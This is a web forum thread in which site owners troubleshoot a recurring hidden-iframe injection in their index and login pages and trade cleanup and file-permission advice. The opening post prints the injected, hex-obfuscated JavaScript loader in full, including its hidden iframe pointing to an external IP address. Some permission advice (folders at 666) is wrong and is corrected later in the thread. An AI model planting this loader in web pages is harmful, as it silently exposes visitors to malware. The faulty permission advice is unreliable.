IFRAME homepage Insertion

[Imran]

We just had some weird script installed on our index.php file of
domain.com which has been removed.. Some details of what this is can be
found at:

http://www.trendmicro.com/vinfo/viru...E%2ECW&VSect=P

The Iframe that is inserted into the index.php is:

Code:

<iframe src='http://url' width='1' height='1'
style='visibility: hidden;'></iframe><script>function
v475c44d384a1a(v475c44d3851e7){ function v475c44d3859b9 () {return 16;}
return(parseInt(v475c44d3851e7,v475c44d3859b9()));}function
v475c44d386957(v475c44d38712a){ var v475c44d38889a=2; var
v475c44d3878f8='';for(v475c44d3880c3=0;
v475c44d3880c3<v475c44d38712a.length; v475c44d3880c3+=v475c44d38889a){
v475c44d3878f8+=(String.fromCharCode(v475c44d384a1a(v475c44d38712a.substr(v475c44d3880c3,
v475c44d38889a))));}return v475c44d3878f8;}
document.write(v475c44d386957('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D33653131207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3237373932292B2761373532643866335C272077696474683D3438206865696768743D353739207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

The above javascript is a encrypted code which takes you to a IP address hosted in Russia.
77.221.133.188.addr.datapoint.ru [77.221.133.188 ]
That is datapoint.ru is the datacenter, this include has a Virus in the site which is installed in index.php. This is been really happening on many sites, every day I have to get up and change index.php file on many sites, I have all permissions set up fine.
The hijackthis, log seems to be fine too.
I scanned my system looks fine.
For some information about this you can look here as well.
http://www.google.com/search?q=%3Cif...L_enIN249IN249

Can any one provide some sort of a solution to this problem.
Thanks.

[svsanchez]

We are having the same problem, the code gets inserted twice a day on all index and default pages, we have to continually remove it manually. We just banned the IP you mentionned above but I'm not sure this is going to solve it. Maybe a tomahawk at the russian server hosting the virus?

[Imran]

Hey man after lot of research I found the solution to this problem, since three servers were infected had to do some research.
Your website is infected with Virus, You must have kept some folders open with 777 permissions, please check for index.html which will be about 1kb also index.php about 1kb that has the virus /trojan which keeps inserting again and again and again.
Better delete those files ad replace them with older backups.

[svsanchez]

Hey Imran, thx for the tip. I found a folder with 777 permission so I changed it and removed the code from all index and default files. Another file that gets the code inserted is login.php, I assume that all login files regardless of their extension will also be affected. Hope this ends this nightmare, and really somebody should shut down that russian server!!!

[Imran]

I suggest you to change your FTP/Cpanel Passwords, just in case.

[Imran]

The Trojan / Virus also Works on home.php, default.php, index.php, similarly on html, and other formats.
The best bet would be to download your site scan with Latest kaspersky Antivirus patterns and reupload the site. if you have a site which is very big, in size then you have to work lot.

Note: This Virus/trojan does not write into deep inside the folders.
It just writes in the following describe method:
www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html

It does not write into
www/folder1/folder_inside_folder1/ << does not infect here.
hence you would just need to download infected files and scan them.

[Imran]

Just another Update Cpanel have a very good solution for this and discussion.
http://forums.cpanel.net/showthread.php?t=62821

[kmofo]

I'm experiencing the same problem, but i don't have access to cpanel update. Is changing permissions to folders and replacing the infected files enough?

[Imran]

There are manythings to be done, basic is permissions related make sure you remove all infected files and change File permissions to 444 and folders to 666

[Ladadadada]

Folders should be 755, not 666. 666 permissions will mean that you can't look inside the folder. You will be able to read the folder itself and write new file inside the folder but you won't be able to "cd" into the folder or "ls" the folder. This will probably also mean that Apache can't serve the files in those folders.

755 permissions will allow you to do everything inside the folder but everyone else will only be able to read and look inside the folder. This means that if a new file is created, you will know that whoever did it either has a way into your account or the root account. If an existing file changes in those directories then you will need to check the ownership of the file that was changed.

644 permissions for files is pretty much the same thing as 755 for directories. Only you can change the file but anyone can read it. As before, this means that if the file has changed, the attacker has either got your account or the root account.

If a file is owned by nobody or has world-writable permissions then the attacker may only have a PHP inclusion vulnerability rather than having an account on your system. This would still be bad but it's not quite as bad because the attacker would be limited in the things he could do.

[kmofo]

Thanks guys! Done what you suggested and now it's all ok!

[Breakaway11]

I had the same problem and I did what you guys suggested!! This is such an awesome forum!

I can't believe these links were hidden in my page! SEO Black hat link building sucks!

[MoneyMoose]

Thanks for the helpful info + heads-up - checked out my sites and they seem clean but you never know...

[baybossplaya]

what a goldmine!

[Imran]

Glad this thread is helping so many of you.
You should always be aware of permissions your website : Folders / Files have, who has the permission to execuite and who has the permission to read/write. This Information and proper permissions will make you safe from these IFRAME Attacks.

Recently one my clients website had another Iframe attack which was redirecting it to iloveads.myspace.com from x0ss.info website, a IFRAME Attack any one who have such attack look into your template/files with 777 permissions. change it back to 444 for files to avoid any such future attacks.

[amoona]

Good post. Thank you man, it helps me a lot!

[andyoudontstop]

Interesting issue. How widespread was this issue last year as I never heard of it. Cpanel has been experiencing a number of vulnerabilities as of late. Check out: http://forums.digitalpoint.com/showthread.php?t=738896

[Varsys Inc.]

777 permissions permissions for files on a web server is the invitation for a hacker to alter the content of your files. Securing it is a must.
The easiest way to maintain proper permissions is to set it up on a higher level directory and have them always inherited for subfolders and files.
Good luck!

[killer2021]

Interesting, I am going to look into this!

[JavaPF]

This is also happening to my server and it is not due to CHMOD issues.

I have uninstalled every single script that I had running. The only thing I have left which is essential is vBulletin.

Do you other effected people also run vBulletin?

As there is nothing else left on my server but vBulletin, I'm pretty sure this is happening due to a php injection exploit. Maybe not in vBulletin itself but with one of the add-ons or modifications.

This is very interesting although annoying!! Its obviousally some sort of automated attack as not long after removing the injected html, it comes back again.

Please keep this thread updated with any new information. I will be sure to post my solution when I eventually find the real security hole.